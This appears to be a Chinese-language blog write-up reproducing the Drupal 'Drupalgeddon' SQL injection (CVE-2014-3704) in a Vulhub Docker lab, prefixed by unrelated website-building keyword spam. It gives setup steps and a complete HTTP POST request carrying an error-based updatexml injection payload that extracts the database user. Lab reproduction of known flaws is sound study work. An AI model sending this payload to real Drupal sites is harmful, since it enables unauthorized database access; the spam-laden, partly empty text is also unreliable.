新民电商网站建设价格咨询,免费域名网站,制作微信网站模板下载不了,网站建设存在的问题感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号CVE-2014-3704漏洞名称Drupal “Drupalgeddon” SQL注入漏洞漏洞… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号CVE-2014-3704漏洞名称Drupal “Drupalgeddon” SQL注入漏洞漏洞评级影响范围Drupal 7.0~7.31版本漏洞描述修复方案
1.1、漏洞描述
Drupal 是一款用量庞大的CMS其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞攻击者可以执行任意SQL语句插入、修改管理员信息甚至执行任意代码。
1.2、漏洞等级
1.3、影响版本
Drupal 7.0~7.31版本
1.4、漏洞复现
1、基础环境
PathVulhub/drupal/CVE-2014-3704 启动测试环境
sudo docker-compose up -d访问http://your-ip:8080/即可看到Drupal的安装页面使用默认配置安装即可 其中Mysql数据库名填写drupal数据库用户名、密码为root地址为mysql 2、漏洞扫描
3、漏洞验证
发送如下数据包
POST /?qnodedestinationnode HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120passlolform_build_idform_iduser_login_blockopLoginname[0 or updatexml(0,concat(0xa,user()),0)%23]bobname[0]a